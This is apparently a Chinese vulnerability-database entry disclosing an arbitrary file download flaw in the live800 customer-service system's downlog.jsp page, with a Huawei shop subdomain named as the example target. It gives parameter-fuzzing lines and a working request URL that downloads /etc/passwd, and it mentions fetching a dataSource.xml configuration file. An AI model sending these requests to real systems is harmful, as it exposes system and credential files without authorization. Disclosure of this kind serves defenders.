live800客服系统任意文件下载漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 偷闲发个漏洞,许多大厂商在,用危害挺大的。 ### 详细说明: 在live800客服站点上fuzz出一个downlog.jsp文件 这里以 华为 为例: ``` http://robotim.vmall.com/live800/downlog.jsp ``` [<img src="https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/17011441b30d37acd06be31ff2f078c1077d148b.png) 根据提示猜测有可能是downlog.jsp没有接收到下载路径,于是继续fuzz参数: ``` downlog.jsp?path=/&file=etc/passwd downlog.jsp?filepath=/&file=etc/passwd downlog.jsp?filepath=/&filename=etc/passwd …… ``` 最终fuzz到downlog.jsp?filepath=/&fileName=/etc/passwd成功下载文件。 ``` http://robotim.vmall.com/live800/downlog.jsp?path=/&fileName=/etc/passwd ``` [<img src="https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/170121542936117806674ceff9c9231e8269cd9a.png) 通过此漏洞下载dataSource.xml文件: ```...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息